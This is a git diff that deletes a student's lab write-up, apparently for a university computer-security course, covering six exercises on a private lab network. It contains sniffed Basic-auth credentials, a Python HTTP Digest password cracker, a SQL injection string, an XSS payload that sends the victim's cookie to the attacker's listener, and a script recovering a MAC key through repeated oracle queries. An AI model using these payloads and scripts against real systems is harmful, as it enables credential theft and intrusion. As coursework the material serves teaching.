aboutsummaryrefslogtreecommitdiffstats
path: root/csci5271/ho2/writeup.md
diff options
context:
space:
mode:
Diffstat (limited to 'csci5271/ho2/writeup.md')
-rw-r--r--csci5271/ho2/writeup.md139
1 files changed, 0 insertions, 139 deletions
diff --git a/csci5271/ho2/writeup.md b/csci5271/ho2/writeup.md
deleted file mode 100644
index ea63dd3..0000000
--- a/csci5271/ho2/writeup.md
+++ /dev/null
@@ -1,139 +0,0 @@
-# 1
-
-## Packet
-
-```
-IP 192.168.14.3.46826 > 192.168.14.1.80: Flags [P.], seq 1:143, ack 1, win 502, options [nop,nop,TS val 1452909150 ecr 2428281190], length 142: HTTP: GET /secret/file HTTP/1.1
-E.....@.@..............P.Tw.|..j...........
-V..^...fGET /secret/file HTTP/1.1
-Host: 192.168.14.1
-Authorization: Basic dHJhdmlzMTQ6bWFpdkRlY2d1cjIyMDI=
-User-Agent: curl/7.58.0
-Accept: */*
-```
-
-## User/Pass
-`travis14:maivDecgur2202`
-
-## Contents
-
-```html
-I'm going to let you in on a little secret. Every day, once a day, give yourself a present. Don’t plan it; don’t wait for it; just let it happen.
-- Dale Cooper
-```
-
-# 2
-## Packet
-
-```
-182203 IP 192.168.14.2.36586 > 192.168.14.1.80: Flags [P.], seq 91:464, ack 308, win 501, options [nop,nop,TS val 422351445 ecr 1957960104], length 373: HTTP: HEAD /secret/cheese HTTP/1.1
-E.....@.@..v...........P,..................
-.,.Ut...HEAD /secret/cheese HTTP/1.1
-Host: 192.168.14.1
-Authorization: Digest username="travis14", realm="Cheese", nonce="/DPYEFbSBQA=c06893026441a70acf049b49540e97acd2bdd640", uri="/secret/cheese", cnonce="ZjdlNTk0ZGZmMDQwZTU3OTM2MTIxOGEyNzljNDJlYzc=", nc=00000001, qop=auth, response="872aafc461761e417d2df47b85e43d2b", algorithm="MD5"
-User-Agent: curl/7.58.0
-Accept: */*
-```
-
-## Crack
-
-```python
-# HTTP Digest Authentication cracker
-import hashlib
-
-username = "travis14"
-realm = "Cheese"
-nonce = "/DPYEFbSBQA=c06893026441a70acf049b49540e97acd2bdd640"
-uri = "/secret/cheese"
-qop = "auth"
-nc = "00000001"
-cnonce = "ZjdlNTk0ZGZmMDQwZTU3OTM2MTIxOGEyNzljNDJlYzc="
-response = "872aafc461761e417d2df47b85e43d2b"
-
-# Calculate the response
-with open("10k-most-common.txt") as f:
- for line in f:
- line = line.strip('\n').strip()
- ha1 = hashlib.md5((username + ":" + realm + ":" + line).encode('utf-8')).hexdigest()
- ha2 = hashlib.md5(("HEAD" + ":" + uri).encode('utf-8')).hexdigest()
- response = hashlib.md5((ha1 + ":" + nonce + ":" + nc + ":" + cnonce + ":" + qop + ":" + ha2).encode('utf-8')).hexdigest()
- # print(line + ":" + response)
- if (response == "872aafc461761e417d2df47b85e43d2b"):
- print("Password: " + line)
- break
-
-```
-## Password
-
-`Password: domain`
-
-## Contents
-
-```
-Intelligence alone is not nearly enough when it comes to acting wisely.
-
-— Fyodor Dostoevsky
-```
-
-# 3
-
-## Cookie
-
-`Stephen2019-11-03T12%3A44%3A21Z`
-
-# 4
-
-The secret to figuring out the SQL injection was ~~trying everything~~ tuning the query to stop returning Error 500.
-
-## Request
-
-`picture=char-kway-teow.jpg'+OR+1=1+AND'user=alice--`
-
-## Response
-
-`The best char kway teow is Penang char kway teow (lat: 5.411135 / lng: 100.330462)`
-
-# 5
-
-
-## XSS
-
-```html
-<script>document.location="http://192.168.14.3:8080/?cookie="+document.cookie;</script>
-```
-
-## Cookie
-`GET /?cookie=auth=Iwillseeyouagainin32years. HTTP/1.1" 200 -`
-
-## Writeup
-The main additional thing I did was start up a `SimpleHTTPServer` on port 8080 of the server I have SSH access to. The attack works because the server is making an HTTP request to that port with the cookie being that of the browser.
-
-# 6
-## Code
-```python
-import requests
-from requests.packages.urllib3.exceptions import InsecureRequestWarning
-import string
-
-requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
-
-actual = ""
-key = "Z"*19
-for n in range(19, -1, -1):
- res2 = requests.get("https://192.168.14.1/mac-cookie?username="+key,
- verify=False).text.replace(".", "").split(" ")[-1].split('\n')[0]
- for c in string.printable:
- test = key[:n] + c
- res1 = requests.get("https://192.168.14.1/mac-cookie?username="+test,
- verify=False).text.replace(".", "").split(" ")[-1].split('\n')[0]
- #print(test, res1, res2)
- if res1 == res2:
- actual = c + actual
- break
- key = key[:-1]
-
-print("Key is", actual)
-```
-
-## Key
-`###################k`